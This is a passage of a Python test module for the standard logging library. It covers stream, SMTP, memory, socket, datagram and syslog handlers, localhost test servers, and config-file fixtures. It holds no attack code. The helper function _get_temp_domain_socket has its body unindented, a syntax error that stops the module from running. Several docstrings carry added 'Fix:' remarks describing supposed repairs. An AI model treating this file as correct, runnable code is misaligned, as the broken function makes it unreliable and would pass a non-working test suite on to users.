                # Only GET and POST are valid HTTPHandler methods.
                self.assertRaises(ValueError, logging.handlers.HTTPHandler,
                                  'localhost', '/log', method)
            else:
                h = logging.handlers.HTTPHandler('localhost', '/log', method)
                h.close()
        # capacity 0 => every record triggers a flush
        h = logging.handlers.BufferingHandler(0)
        r = logging.makeLogRecord({})
        self.assertTrue(h.shouldFlush(r))
        h.close()
        h = logging.handlers.BufferingHandler(1)
        self.assertFalse(h.shouldFlush(r))
        h.close()

    def test_path_objects(self):
        # Test that file-based handlers also accept pathlib.Path objects
        # instead of plain string filenames.
        fd, fn = tempfile.mkstemp()
        os.close(fd)
        os.unlink(fn)
        pfn = pathlib.Path(fn)
        cases = (
            (logging.FileHandler, (pfn, 'w')),
            (logging.handlers.RotatingFileHandler, (pfn, 'a')),
            (logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
        )
        if sys.platform in ('linux', 'darwin'):
            cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
        for cls, args in cases:
            h = cls(*args)
            self.assertTrue(os.path.exists(fn))
            h.close()
            os.unlink(fn)

    @unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
    def test_race(self):
        # Issue #14632: WatchedFileHandler must survive the log file being
        # deleted out from under it by a concurrent thread.
        def remove_loop(fname, tries):
            for _ in range(tries):
                try:
                    os.unlink(fname)
                    self.deletion_time = time.time()
                except OSError:
                    pass
                time.sleep(0.004 * random.randint(0, 4))

        del_count = 500
        log_count = 500

        self.handle_time = None
        self.deletion_time = None

        for delay in (False, True):
            fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
            os.close(fd)
            remover = threading.Thread(target=remove_loop, args=(fn, del_count))
            remover.daemon = True
            remover.start()
            h = logging.handlers.WatchedFileHandler(fn, delay=delay)
            f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
            h.setFormatter(f)
            try:
                for _ in range(log_count):
                    time.sleep(0.005)
                    r = logging.makeLogRecord({'msg': 'testing' })
                    try:
                        self.handle_time = time.time()
                        h.handle(r)
                    except Exception:
                        print('Deleted at %s, '
                              'opened at %s' % (self.deletion_time,
                                                self.handle_time))
                        raise
            finally:
                remover.join()
                h.close()
                if os.path.exists(fn):
                    os.unlink(fn)
class BadStream(object):
    """Stream stand-in whose write() always fails, to exercise error paths."""

    def write(self, chunk):
        # Every write attempt triggers the handler's error machinery.
        raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
    """StreamHandler subclass that records, rather than reports, bad records."""

    def handleError(self, record):
        # Stash the offending record so tests can inspect it afterwards.
        self.error_record = record
class StreamHandlerTest(BaseTest):
    """Tests for StreamHandler error handling and stream swapping."""

    def test_error_handling(self):
        h = TestStreamHandler(BadStream())
        r = logging.makeLogRecord({})
        old_raise = logging.raiseExceptions

        try:
            # Subclassed handleError captures the record instead of printing.
            h.handle(r)
            self.assertIs(h.error_record, r)

            # Default handleError writes the traceback to stderr...
            h = logging.StreamHandler(BadStream())
            with support.captured_stderr() as stderr:
                h.handle(r)
                msg = '\nRuntimeError: deliberate mistake\n'
                self.assertIn(msg, stderr.getvalue())

            # ...unless raiseExceptions is off, in which case it is silent.
            logging.raiseExceptions = False
            with support.captured_stderr() as stderr:
                h.handle(r)
                self.assertEqual('', stderr.getvalue())
        finally:
            logging.raiseExceptions = old_raise

    def test_stream_setting(self):
        """
        Test setting the handler's stream
        """
        h = logging.StreamHandler()
        stream = io.StringIO()
        # setStream returns the previous stream, or None if unchanged.
        old = h.setStream(stream)
        self.assertIs(old, sys.stderr)
        actual = h.setStream(old)
        self.assertIs(actual, stream)
        # test that setting to existing value returns None
        actual = h.setStream(old)
        self.assertIsNone(actual)
class TestSMTPServer(smtpd.SMTPServer):
    """
    This class implements a test SMTP server.  Received messages are passed
    to a caller-supplied handler callable, and the server runs on its own
    asyncore loop thread.

    Fix: ``Thread.setDaemon(True)`` is deprecated (since Python 3.10) in
    favour of assigning the ``daemon`` attribute.
    """

    def __init__(self, addr, handler, poll_interval, sockmap):
        """
        :param addr: (host, port) to listen on; port 0 picks a free port,
                     recorded afterwards in ``self.port``.
        :param handler: callable taking (peer, mailfrom, rcpttos, data),
                        invoked for each received message.
        :param poll_interval: polling interval for the asyncore loop.
        :param sockmap: socket map passed to asyncore.
        """
        smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
                                  decode_data=True)
        self.port = self.socket.getsockname()[1]
        self._handler = handler
        self._thread = None
        self.poll_interval = poll_interval

    def process_message(self, peer, mailfrom, rcpttos, data):
        """
        Delegate an incoming message to the handler callable.
        """
        self._handler(peer, mailfrom, rcpttos, data)

    def start(self):
        """
        Start the server running on a separate daemon thread.
        """
        self._thread = t = threading.Thread(target=self.serve_forever,
                                            args=(self.poll_interval,))
        t.daemon = True
        t.start()

    def serve_forever(self, poll_interval):
        """
        Run the :mod:`asyncore` loop until normal termination.

        :param poll_interval: The interval, in seconds, used in the underlying
                              :func:`select` or :func:`poll` call by
                              :func:`asyncore.loop`.
        """
        asyncore.loop(poll_interval, map=self._map)

    def stop(self, timeout=None):
        """
        Stop the thread by closing the server instance.
        Wait for the server thread to terminate.

        :param timeout: How long to wait for the server thread
                        to terminate.
        """
        self.close()
        support.join_thread(self._thread, timeout)
        self._thread = None
        asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
    """
    This mixin is used to start a server on a separate thread, and
    shut it down programmatically.  Request handling is simplified: instead
    of needing to derive a suitable RequestHandler subclass, you just
    provide a callable which will be passed each received request to be
    processed.

    Fix: ``Thread.setDaemon(True)`` is deprecated (since Python 3.10) in
    favour of assigning the ``daemon`` attribute.

    :param handler: A handler callable which will be called with a
                    single parameter - the request - in order to
                    process the request.
    :param poll_interval: The polling interval in seconds.
    """
    def __init__(self, handler, poll_interval):
        self._thread = None
        self.poll_interval = poll_interval
        self._handler = handler
        # Set once serve_forever() is actually running.
        self.ready = threading.Event()

    def start(self):
        """
        Create a daemon thread which runs the server, and start it.
        """
        self._thread = t = threading.Thread(target=self.serve_forever,
                                            args=(self.poll_interval,))
        t.daemon = True
        t.start()

    def serve_forever(self, poll_interval):
        """
        Run the server. Set the ready flag before entering the
        service loop.
        """
        self.ready.set()
        super(ControlMixin, self).serve_forever(poll_interval)

    def stop(self, timeout=None):
        """
        Tell the server thread to stop, and wait for it to do so.

        :param timeout: How long to wait for the server thread
                        to terminate.
        """
        self.shutdown()
        if self._thread is not None:
            support.join_thread(self._thread, timeout)
            self._thread = None
        self.server_close()
        self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
    """
    An HTTP server which is controllable using :class:`ControlMixin`.

    :param addr: A tuple with the IP address and port to listen on.
    :param handler: A handler callable which will be called with a
                    single parameter - the request - in order to
                    process the request.
    :param poll_interval: The polling interval in seconds.
    :param log: Pass ``True`` to enable log messages.
    :param sslctx: optional SSLContext; when given, accepted sockets are
                   wrapped for TLS in :meth:`get_request`.
    """
    def __init__(self, addr, handler, poll_interval=0.5,
                 log=False, sslctx=None):
        class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
            def __getattr__(self, name, default=None):
                # Route every do_GET/do_POST/... lookup to process_request.
                if name.startswith('do_'):
                    return self.process_request
                raise AttributeError(name)

            def process_request(self):
                self.server._handler(self)

            def log_message(self, format, *args):
                if log:
                    super(DelegatingHTTPRequestHandler,
                          self).log_message(format, *args)
        HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
        ControlMixin.__init__(self, handler, poll_interval)
        self.sslctx = sslctx

    def get_request(self):
        try:
            sock, addr = self.socket.accept()
            if self.sslctx:
                sock = self.sslctx.wrap_socket(sock, server_side=True)
        except OSError as e:
            # socket errors are silenced by the caller, print them here
            sys.stderr.write("Got an error:\n%s\n" % e)
            raise
        return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
    """
    A TCP server which is controllable using :class:`ControlMixin`.

    :param addr: A tuple with the IP address and port to listen on.
    :param handler: A handler callable which will be called with a single
                    parameter - the request - in order to process the request.
    :param poll_interval: The polling interval in seconds.
    :bind_and_activate: If True (the default), binds the server and starts it
                        listening. If False, you need to call
                        :meth:`server_bind` and :meth:`server_activate` at
                        some later time before actually using the server.
    """

    allow_reuse_address = True

    def __init__(self, addr, handler, poll_interval=0.5,
                 bind_and_activate=True):
        class DelegatingTCPRequestHandler(StreamRequestHandler):

            def handle(self):
                self.server._handler(self)
        ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
                                    bind_and_activate)
        ControlMixin.__init__(self, handler, poll_interval)

    def server_bind(self):
        super(TestTCPServer, self).server_bind()
        # Record the actual bound port (useful when addr requested port 0).
        self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
    """
    A UDP server which is controllable using :class:`ControlMixin`.

    :param addr: A tuple with the IP address and port to listen on.
    :param handler: A handler callable which will be called with a
                    single parameter - the request - in order to
                    process the request.
    :param poll_interval: The polling interval for shutdown requests,
                          in seconds.
    :bind_and_activate: If True (the default), binds the server and
                        starts it listening. If False, you need to
                        call :meth:`server_bind` and
                        :meth:`server_activate` at some later time
                        before actually using the server.
    """
    def __init__(self, addr, handler, poll_interval=0.5,
                 bind_and_activate=True):
        class DelegatingUDPRequestHandler(DatagramRequestHandler):

            def handle(self):
                self.server._handler(self)

            def finish(self):
                data = self.wfile.getvalue()
                if data:
                    try:
                        super(DelegatingUDPRequestHandler, self).finish()
                    except OSError:
                        # The socket may already be closed during shutdown;
                        # only propagate when the server is still live.
                        if not self.server._closed:
                            raise

        ThreadingUDPServer.__init__(self, addr,
                                    DelegatingUDPRequestHandler,
                                    bind_and_activate)
        ControlMixin.__init__(self, handler, poll_interval)
        self._closed = False

    def server_bind(self):
        super(TestUDPServer, self).server_bind()
        # Record the actual bound port (useful when addr requested port 0).
        self.port = self.socket.getsockname()[1]

    def server_close(self):
        super(TestUDPServer, self).server_close()
        self._closed = True
# Unix-domain-socket variants of the servers are only defined on platforms
# that provide AF_UNIX.
if hasattr(socket, "AF_UNIX"):
    class TestUnixStreamServer(TestTCPServer):
        address_family = socket.AF_UNIX

    class TestUnixDatagramServer(TestUDPServer):
        address_family = socket.AF_UNIX
class SMTPHandlerTest(BaseTest):
    """Round-trip a log record through SMTPHandler to a local test server."""

    # Timeout for the handler and for waiting on message delivery.
    TIMEOUT = 60.0

    def test_basic(self):
        sockmap = {}
        server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
                                sockmap)
        server.start()
        addr = (support.HOST, server.port)
        h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
                                         timeout=self.TIMEOUT)
        self.assertEqual(h.toaddrs, ['you'])
        self.messages = []
        # Non-ASCII payload to check the message survives encoding intact.
        r = logging.makeLogRecord({'msg': 'Hello \u2713'})
        self.handled = threading.Event()
        h.handle(r)
        self.handled.wait(self.TIMEOUT)
        server.stop()
        self.assertTrue(self.handled.is_set())
        self.assertEqual(len(self.messages), 1)
        peer, mailfrom, rcpttos, data = self.messages[0]
        self.assertEqual(mailfrom, 'me')
        self.assertEqual(rcpttos, ['you'])
        self.assertIn('\nSubject: Log\n', data)
        self.assertTrue(data.endswith('\n\nHello \u2713'))
        h.close()

    def process_message(self, *args):
        # Called by TestSMTPServer for each delivered message.
        self.messages.append(args)
        self.handled.set()
class MemoryHandlerTest(BaseTest):
    """Tests for the MemoryHandler."""

    # Do not bother with a logger name group.
    expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"

    def setUp(self):
        BaseTest.setUp(self)
        # Buffer up to 10 records; flush on WARNING or above.
        self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
                                                       self.root_hdlr)
        self.mem_logger = logging.getLogger('mem')
        self.mem_logger.propagate = 0
        self.mem_logger.addHandler(self.mem_hdlr)

    def tearDown(self):
        self.mem_hdlr.close()
        BaseTest.tearDown(self)

    def test_flush(self):
        # The memory handler flushes to its target handler based on specific
        # criteria (message count and message level).
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines([])
        self.mem_logger.info(self.next_message())
        self.assert_log_lines([])
        # This will flush because the level is >= logging.WARNING
        self.mem_logger.warning(self.next_message())
        lines = [
            ('DEBUG', '1'),
            ('INFO', '2'),
            ('WARNING', '3'),
        ]
        self.assert_log_lines(lines)
        for n in (4, 14):
            for i in range(9):
                self.mem_logger.debug(self.next_message())
            self.assert_log_lines(lines)
            # This will flush because it's the 10th message since the last
            # flush.
            self.mem_logger.debug(self.next_message())
            lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
            self.assert_log_lines(lines)

        self.mem_logger.debug(self.next_message())
        self.assert_log_lines(lines)

    def test_flush_on_close(self):
        """
        Test that the flush-on-close configuration works as expected.
        """
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines([])
        self.mem_logger.info(self.next_message())
        self.assert_log_lines([])
        self.mem_logger.removeHandler(self.mem_hdlr)
        # Default behaviour is to flush on close. Check that it happens.
        self.mem_hdlr.close()
        lines = [
            ('DEBUG', '1'),
            ('INFO', '2'),
        ]
        self.assert_log_lines(lines)
        # Now configure with flushOnClose=False and check nothing is flushed.
        self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
                                                       self.root_hdlr,
                                                       False)
        self.mem_logger.addHandler(self.mem_hdlr)
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines(lines)  # no change
        self.mem_logger.info(self.next_message())
        self.assert_log_lines(lines)  # no change
        self.mem_logger.removeHandler(self.mem_hdlr)
        self.mem_hdlr.close()
        # assert that no new lines have been added
        self.assert_log_lines(lines)  # no change
class ExceptionFormatter(logging.Formatter):
    """Formatter which renders exception info as just the exception class name."""

    def formatException(self, ei):
        # ei is a standard (type, value, traceback) triple; only the type's
        # name is reported.
        exc_class = ei[0]
        return "Got a [%s]" % exc_class.__name__
class ConfigFileTest(BaseTest):

    """Reading logging config from a .ini-style config file.

    The ``configN`` class attributes are ini-format fixtures fed through
    :func:`logging.config.fileConfig` (after :func:`textwrap.dedent`).
    """

    check_no_resource_warning = support.check_no_resource_warning
    expected_log_pat = r"^(\w+) \+\+ (\w+)$"

    # config0 is a standard configuration.
    config0 = """
    [loggers]
    keys=root

    [handlers]
    keys=hand1

    [formatters]
    keys=form1

    [logger_root]
    level=WARNING
    handlers=hand1

    [handler_hand1]
    class=StreamHandler
    level=NOTSET
    formatter=form1
    args=(sys.stdout,)

    [formatter_form1]
    format=%(levelname)s ++ %(message)s
    datefmt=
    """

    # config1 adds a little to the standard configuration.
    config1 = """
    [loggers]
    keys=root,parser

    [handlers]
    keys=hand1

    [formatters]
    keys=form1

    [logger_root]
    level=WARNING
    handlers=

    [logger_parser]
    level=DEBUG
    handlers=hand1
    propagate=1
    qualname=compiler.parser

    [handler_hand1]
    class=StreamHandler
    level=NOTSET
    formatter=form1
    args=(sys.stdout,)

    [formatter_form1]
    format=%(levelname)s ++ %(message)s
    datefmt=
    """

    # config1a moves the handler to the root.
    config1a = """
    [loggers]
    keys=root,parser

    [handlers]
    keys=hand1

    [formatters]
    keys=form1

    [logger_root]
    level=WARNING
    handlers=hand1

    [logger_parser]
    level=DEBUG
    handlers=
    propagate=1
    qualname=compiler.parser

    [handler_hand1]
    class=StreamHandler
    level=NOTSET
    formatter=form1
    args=(sys.stdout,)

    [formatter_form1]
    format=%(levelname)s ++ %(message)s
    datefmt=
    """

    # config2 has a subtle configuration error that should be reported
    config2 = config1.replace("sys.stdout", "sys.stbout")

    # config3 has a less subtle configuration error
    config3 = config1.replace("formatter=form1", "formatter=misspelled_name")

    # config4 specifies a custom formatter class to be loaded
    config4 = """
    [loggers]
    keys=root

    [handlers]
    keys=hand1

    [formatters]
    keys=form1

    [logger_root]
    level=NOTSET
    handlers=hand1

    [handler_hand1]
    class=StreamHandler
    level=NOTSET
    formatter=form1
    args=(sys.stdout,)

    [formatter_form1]
    class=""" + __name__ + """.ExceptionFormatter
    format=%(levelname)s:%(name)s:%(message)s
    datefmt=
    """

    # config5 specifies a custom handler class to be loaded
    config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')

    # config6 uses ', ' delimiters in the handlers and formatters sections
    config6 = """
    [loggers]
    keys=root,parser

    [handlers]
    keys=hand1, hand2

    [formatters]
    keys=form1, form2

    [logger_root]
    level=WARNING
    handlers=

    [logger_parser]
    level=DEBUG
    handlers=hand1
    propagate=1
    qualname=compiler.parser

    [handler_hand1]
    class=StreamHandler
    level=NOTSET
    formatter=form1
    args=(sys.stdout,)

    [handler_hand2]
    class=StreamHandler
    level=NOTSET
    formatter=form1
    args=(sys.stderr,)

    [formatter_form1]
    format=%(levelname)s ++ %(message)s
    datefmt=

    [formatter_form2]
    format=%(message)s
    datefmt=
    """

    # config7 adds a compiler logger, and uses kwargs instead of args.
    config7 = """
    [loggers]
    keys=root,parser,compiler

    [handlers]
    keys=hand1

    [formatters]
    keys=form1

    [logger_root]
    level=WARNING
    handlers=hand1

    [logger_compiler]
    level=DEBUG
    handlers=
    propagate=1
    qualname=compiler

    [logger_parser]
    level=DEBUG
    handlers=
    propagate=1
    qualname=compiler.parser

    [handler_hand1]
    class=StreamHandler
    level=NOTSET
    formatter=form1
    kwargs={'stream': sys.stdout,}

    [formatter_form1]
    format=%(levelname)s ++ %(message)s
    datefmt=
    """

    # config8 defines both a file handler and uses it from the root logger;
    # applying it twice must not leak the previously-opened file (bpo-23207).
    config8 = r"""
    [loggers]
    keys=root

    [handlers]
    keys=file

    [formatters]
    keys=

    [logger_root]
    level=DEBUG
    handlers=file

    [handler_file]
    class=FileHandler
    level=DEBUG
    args=("{tempfile}",)
    """

    disable_test = """
    [loggers]
    keys=root

    [handlers]
    keys=screen

    [formatters]
    keys=

    [logger_root]
    level=DEBUG
    handlers=screen

    [handler_screen]
    level=DEBUG
    class=StreamHandler
    args=(sys.stdout,)
    formatter=
    """

    def apply_config(self, conf, **kwargs):
        # fileConfig accepts a file-like object; dedent so the class-level
        # fixtures above can be indented for readability.
        file = io.StringIO(textwrap.dedent(conf))
        logging.config.fileConfig(file, **kwargs)

    def test_config0_ok(self):
        # A simple config file which overrides the default settings.
        with support.captured_stdout() as output:
            self.apply_config(self.config0)
            logger = logging.getLogger()
            # Won't output anything
            logger.info(self.next_message())
            # Outputs a message
            logger.error(self.next_message())
            self.assert_log_lines([
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])

    def test_config0_using_cp_ok(self):
        # A simple config file which overrides the default settings.
        with support.captured_stdout() as output:
            file = io.StringIO(textwrap.dedent(self.config0))
            cp = configparser.ConfigParser()
            cp.read_file(file)
            logging.config.fileConfig(cp)
            logger = logging.getLogger()
            # Won't output anything
            logger.info(self.next_message())
            # Outputs a message
            logger.error(self.next_message())
            self.assert_log_lines([
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])

    def test_config1_ok(self, config=config1):
        # A config file defining a sub-parser as well.
        with support.captured_stdout() as output:
            self.apply_config(config)
            logger = logging.getLogger("compiler.parser")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])

    def test_config2_failure(self):
        # A simple config file which overrides the default settings.
        self.assertRaises(Exception, self.apply_config, self.config2)

    def test_config3_failure(self):
        # A simple config file which overrides the default settings.
        self.assertRaises(Exception, self.apply_config, self.config3)

    def test_config4_ok(self):
        # A config file specifying a custom formatter class.
        with support.captured_stdout() as output:
            self.apply_config(self.config4)
            logger = logging.getLogger()
            try:
                raise RuntimeError()
            except RuntimeError:
                logging.exception("just testing")
            sys.stdout.seek(0)
            self.assertEqual(output.getvalue(),
                "ERROR:root:just testing\nGot a [RuntimeError]\n")
            # Original logger output is empty
            self.assert_log_lines([])

    def test_config5_ok(self):
        self.test_config1_ok(config=self.config5)

    def test_config6_ok(self):
        self.test_config1_ok(config=self.config6)

    def test_config7_ok(self):
        with support.captured_stdout() as output:
            self.apply_config(self.config1a)
            logger = logging.getLogger("compiler.parser")
            # See issue #18652 : config1a has a root handler, so a logger not
            # mentioned in the later config must still work afterwards.
            hyphenated = logging.getLogger('compiler-hyphenated')
            # All will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            hyphenated.critical(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
                ('CRITICAL', '3'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
        with support.captured_stdout() as output:
            self.apply_config(self.config7)
            logger = logging.getLogger("compiler.parser")
            self.assertFalse(logger.disabled)
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            logger = logging.getLogger("compiler.lexer")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            # Will not appear
            hyphenated.critical(self.next_message())
            self.assert_log_lines([
                ('INFO', '4'),
                ('ERROR', '5'),
                ('INFO', '6'),
                ('ERROR', '7'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])

    def test_config8_ok(self):

        def cleanup(h1, fn):
            h1.close()
            os.remove(fn)

        with self.check_no_resource_warning():
            fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
            os.close(fd)

            # Replace single backslash with double backslash in windows
            # to avoid unicode error during string formatting
            if os.name == "nt":
                fn = fn.replace("\\", "\\\\")

            config8 = self.config8.format(tempfile=fn)

            self.apply_config(config8)
            # Applying the same config a second time must close the
            # previously-opened FileHandler (no ResourceWarning).
            self.apply_config(config8)

        handler = logging.root.handlers[0]
        self.addCleanup(cleanup, handler, fn)

    def test_logger_disabling(self):
        self.apply_config(self.disable_test)
        logger = logging.getLogger('some_pristine_logger')
        self.assertFalse(logger.disabled)
        # Re-applying with default disable_existing_loggers=True disables
        # loggers created in the meantime...
        self.apply_config(self.disable_test)
        self.assertTrue(logger.disabled)
        # ...but disable_existing_loggers=False re-enables them.
        self.apply_config(self.disable_test, disable_existing_loggers=False)
        self.assertFalse(logger.disabled)

    def test_defaults_do_no_interpolation(self):
        """bpo-33802 defaults should not get interpolated"""
        ini = textwrap.dedent("""
            [formatters]
            keys=default

            [formatter_default]

            [handlers]
            keys=console

            [handler_console]
            class=logging.StreamHandler
            args=tuple()

            [loggers]
            keys=root

            [logger_root]
            formatter=default
            handlers=console
            """).strip()
        fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
        try:
            os.write(fd, ini.encode('ascii'))
            os.close(fd)
            logging.config.fileConfig(
                fn,
                defaults=dict(
                    version=1,
                    disable_existing_loggers=False,
                    formatters={
                        "generic": {
                            "format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
                            "datefmt": "[%Y-%m-%d %H:%M:%S %z]",
                            "class": "logging.Formatter"
                        },
                    },
                )
            )
        finally:
            os.unlink(fn)
class SocketHandlerTest(BaseTest):

    """Test for SocketHandler objects.

    Fix: the first line of ``setUp`` after ``BaseTest.setUp`` was corrupted
    to ``er_exception = None`` — a useless local assignment.  It is restored
    to ``self.server = self.sock_hdlr = self.server_exception = None`` (the
    same Issue #29177 pattern used by DatagramHandlerTest/SysLogHandlerTest),
    without which ``tearDown`` and the tests can hit ``AttributeError`` when
    server creation fails.
    """

    server_class = TestTCPServer
    address = ('localhost', 0)

    def setUp(self):
        """Set up a TCP server to receive log messages, and a SocketHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        # Issue #29177: deal with errors that happen during setup
        self.server = self.sock_hdlr = self.server_exception = None
        try:
            self.server = server = self.server_class(self.address,
                                                     self.handle_socket, 0.01)
            server.start()
        except OSError as e:
            self.server_exception = e
            return
        server.ready.wait()
        hcls = logging.handlers.SocketHandler
        if isinstance(server.server_address, tuple):
            self.sock_hdlr = hcls('localhost', server.port)
        else:
            self.sock_hdlr = hcls(server.server_address, None)
        self.log_output = ''
        self.root_logger.removeHandler(self.root_logger.handlers[0])
        self.root_logger.addHandler(self.sock_hdlr)
        self.handled = threading.Semaphore(0)

    def tearDown(self):
        """Shutdown the TCP server."""
        try:
            if self.sock_hdlr:
                self.root_logger.removeHandler(self.sock_hdlr)
                self.sock_hdlr.close()
            if self.server:
                self.server.stop(2.0)
        finally:
            BaseTest.tearDown(self)

    def handle_socket(self, request):
        # Decode the length-prefixed pickle stream the SocketHandler sends.
        conn = request.connection
        while True:
            chunk = conn.recv(4)
            if len(chunk) < 4:
                break
            slen = struct.unpack(">L", chunk)[0]
            chunk = conn.recv(slen)
            while len(chunk) < slen:
                chunk = chunk + conn.recv(slen - len(chunk))
            obj = pickle.loads(chunk)
            record = logging.makeLogRecord(obj)
            self.log_output += record.msg + '\n'
            self.handled.release()

    def test_output(self):
        # The log message sent to the SocketHandler is properly received.
        if self.server_exception:
            self.skipTest(self.server_exception)
        logger = logging.getLogger("tcp")
        logger.error("spam")
        self.handled.acquire()
        logger.debug("eggs")
        self.handled.acquire()
        self.assertEqual(self.log_output, "spam\neggs\n")

    def test_noserver(self):
        if self.server_exception:
            self.skipTest(self.server_exception)
        # Avoid timing-related failures due to SocketHandler's own hard-wired
        # one-second timeout on socket.create_connection() (issue #16264).
        self.sock_hdlr.retryStart = 2.5
        # Kill the server
        self.server.stop(2.0)
        # The logging call should try to connect, which should fail
        try:
            raise RuntimeError('Deliberate mistake')
        except RuntimeError:
            self.root_logger.exception('Never sent')
        self.root_logger.error('Never sent, either')
        now = time.time()
        self.assertGreater(self.sock_hdlr.retryTime, now)
        time.sleep(self.sock_hdlr.retryTime - now + 0.001)
        self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
    """Re-run SocketHandlerTest over a Unix domain socket instead of TCP."""

    if hasattr(socket, "AF_UNIX"):
        server_class = TestUnixStreamServer

    def setUp(self):
        # override the definition in the base class
        self.address = _get_temp_domain_socket()
        SocketHandlerTest.setUp(self)

    def tearDown(self):
        SocketHandlerTest.tearDown(self)
        # Remove the socket file created for this test.
        support.unlink(self.address)
class DatagramHandlerTest(BaseTest):

    """Test for DatagramHandler."""

    server_class = TestUDPServer
    address = ('localhost', 0)

    def setUp(self):
        """Set up a UDP server to receive log messages, and a DatagramHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        # Issue #29177: deal with errors that happen during setup
        self.server = self.sock_hdlr = self.server_exception = None
        try:
            self.server = server = self.server_class(self.address,
                                                     self.handle_datagram, 0.01)
            server.start()
            # Uncomment next line to test error recovery in setUp()
            # raise OSError('dummy error raised')
        except OSError as e:
            self.server_exception = e
            return
        server.ready.wait()
        hcls = logging.handlers.DatagramHandler
        if isinstance(server.server_address, tuple):
            self.sock_hdlr = hcls('localhost', server.port)
        else:
            self.sock_hdlr = hcls(server.server_address, None)
        self.log_output = ''
        self.root_logger.removeHandler(self.root_logger.handlers[0])
        self.root_logger.addHandler(self.sock_hdlr)
        self.handled = threading.Event()

    def tearDown(self):
        """Shutdown the UDP server."""
        try:
            if self.server:
                self.server.stop(2.0)
            if self.sock_hdlr:
                self.root_logger.removeHandler(self.sock_hdlr)
                self.sock_hdlr.close()
        finally:
            BaseTest.tearDown(self)

    def handle_datagram(self, request):
        # Datagram payload is a 4-byte length prefix followed by a pickle.
        slen = struct.pack('>L', 0) # length of prefix
        packet = request.packet[len(slen):]
        obj = pickle.loads(packet)
        record = logging.makeLogRecord(obj)
        self.log_output += record.msg + '\n'
        self.handled.set()

    def test_output(self):
        # The log message sent to the DatagramHandler is properly received.
        if self.server_exception:
            self.skipTest(self.server_exception)
        logger = logging.getLogger("udp")
        logger.error("spam")
        self.handled.wait()
        self.handled.clear()
        logger.error("eggs")
        self.handled.wait()
        self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
    """Re-run DatagramHandlerTest over a Unix domain socket instead of UDP."""

    if hasattr(socket, "AF_UNIX"):
        server_class = TestUnixDatagramServer

    def setUp(self):
        # override the definition in the base class
        self.address = _get_temp_domain_socket()
        DatagramHandlerTest.setUp(self)

    def tearDown(self):
        DatagramHandlerTest.tearDown(self)
        # Remove the socket file created for this test.
        support.unlink(self.address)
class SysLogHandlerTest(BaseTest):

    """Test for SysLogHandler using UDP."""

    server_class = TestUDPServer
    address = ('localhost', 0)

    def setUp(self):
        """Set up a UDP server to receive log messages, and a SysLogHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        # Issue #29177: deal with errors that happen during setup
        self.server = self.sl_hdlr = self.server_exception = None
        try:
            self.server = server = self.server_class(self.address,
                                                     self.handle_datagram, 0.01)
            server.start()
            # Uncomment next line to test error recovery in setUp()
            # raise OSError('dummy error raised')
        except OSError as e:
            self.server_exception = e
            return
        server.ready.wait()
        hcls = logging.handlers.SysLogHandler
        if isinstance(server.server_address, tuple):
            self.sl_hdlr = hcls((server.server_address[0], server.port))
        else:
            self.sl_hdlr = hcls(server.server_address)
        self.log_output = ''
        self.root_logger.removeHandler(self.root_logger.handlers[0])
        self.root_logger.addHandler(self.sl_hdlr)
        self.handled = threading.Event()

    def tearDown(self):
        """Shutdown the server."""
        try:
            if self.server:
                self.server.stop(2.0)
            if self.sl_hdlr:
                self.root_logger.removeHandler(self.sl_hdlr)
                self.sl_hdlr.close()
        finally:
            BaseTest.tearDown(self)

    def handle_datagram(self, request):
        # Keep the raw bytes; the tests assert on the exact wire format.
        self.log_output = request.packet
        self.handled.set()

    def test_output(self):
        if self.server_exception:
